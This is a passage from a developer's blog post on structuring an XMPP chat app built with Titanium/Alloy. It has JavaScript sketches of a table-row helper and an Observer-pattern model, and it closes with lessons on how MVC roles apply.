To keep the controller's code structured and to avoid code repetition, I have encapsulated the construction of table rows into functions.
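Such a helper could look as follows (a hypothetical sketch; the function name and the styling values are made up, and do not come from the actual app). Because TSS styles do not apply to dynamically composed elements, the styling properties must be spelled out explicitly:

```javascript
// Hypothetical helper that keeps dynamic row construction in one place.
// It returns the properties for a single contact row; styling is provided
// explicitly because TSS does not apply to JavaScript-composed elements.
function createContactRowProperties(contact) {
    return {
        title: contact.name + " (" + contact.presence + ")",
        color: contact.presence === "online" ? "green" : "gray",
        height: 44
    };
}
```

In the controller, the result can then be passed to Ti.UI.createTableViewRow() for each contact in the roster.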

Notifying views for changes

Another practical issue I ran into is updating the UI components when something changes, such as receiving a text message or an update of a contact's status. An update to a backbone model automatically updates the attached view components, but for anything that is not backbone-based (such as XMPP's internal roster object) this will not work.

I ended up implementing my own custom non-backbone based data model, with my own implementation of the Observer design pattern -- each object in the data model inherits from the Observable prototype providing an infrastructure for observers to register and unregister themselves for notifications. Each view registers itself as an observer to the corresponding model object to update themselves.
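A minimal sketch of such an Observable prototype is shown below (the names are illustrative; the app's actual implementation may differ in details):

```javascript
// Simplified Observable: model objects inherit from it so that views can
// register themselves and get notified whenever the model object changes.
function Observable() {
    this.observers = [];
}

Observable.prototype.register = function (observer) {
    this.observers.push(observer);
};

Observable.prototype.unregister = function (observer) {
    this.observers = this.observers.filter(function (o) {
        return o !== observer;
    });
};

Observable.prototype.notify = function () {
    this.observers.forEach(function (observer) {
        observer.update(this); // each observer refreshes itself
    }, this);
};

// Example model object: a contact whose presence status may change
function Contact(name) {
    Observable.call(this);
    this.name = name;
    this.presence = "offline";
}

Contact.prototype = Object.create(Observable.prototype);

Contact.prototype.setPresence = function (presence) {
    this.presence = presence;
    this.notify(); // views observing this contact update themselves
};
```

A view then registers itself with `contact.register(view)` and implements an `update()` function that redraws the corresponding UI elements.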

The app's architecture

In the end, this is the architecture of the example chat app that I came up with:

The UML diagram shows the following aspects:

  • All classes can be divided into four concerns: controllers, views, models, and utility classes. The observer infrastructure, for example, does in my opinion not belong to any of the MVC categories, because it is cross-cutting.
  • The XMPPEventHandler is considered to be a controller. Despite not being triggered by human actions, I still classify it as such. The event handler's only responsibility is to update the corresponding model objects once an event has been received from the XMPP server, such as a chat message.
  • All model objects inherit from a custom-made Observable prototype so that views can register and unregister themselves for update notifications.
  • Views extract information from the model objects to display. Furthermore, each view has its own controller responding to user input, such as button clicks.

Lessons learned

In addition to porting an XMPP library from the Node.js ecosystem to Titanium, I have also observed some recurring challenges when implementing the test application and keeping it structured. Despite the fact that the Alloy framework is MVC-based, it does not guarantee that your application's organization remains structured.

From my experiences, I have learned the following lessons:

  • The roles of each concern in MVC are not well defined, so you need to give your own interpretation to them. For example, I would consider any controller to be an object responding to external events, regardless of whether they have been triggered by humans or external systems. By following this interpretation, I ended up implementing the XMPP event handler as a controller.
  • Similarly for the models -- the purpose of backbone.js models is mostly to organize data, but a model is more than just data -- from my perspective, the model encapsulates domain knowledge. This also means that non-backbone objects belong to this domain. The same thing applies to non-data objects, such as functions doing computations.
  • You always have to look at your structure from an aesthetic point of view. Does it make sense? Is it readable? Can it be simplified?
  • Finally, do not rely on a framework or API to solve all your problems -- study the underlying concepts and remain critical, as a framework does not always guarantee that your organization will be right.

Within the scope of Titanium/Alloy, the problem is that models only make sense if you use backbone models, and using XML markup and TSS for views only makes sense if your screen structure is static. The most logical outcome is to put all remaining pieces that do not classify themselves into these categories into a controller, but that is probably the most likely reason why your code becomes a mess.

As a final note, the lessons learned do not apply to mobile applications or Titanium/Alloy only -- you will find similar challenges in other domains such as web applications and desktop applications.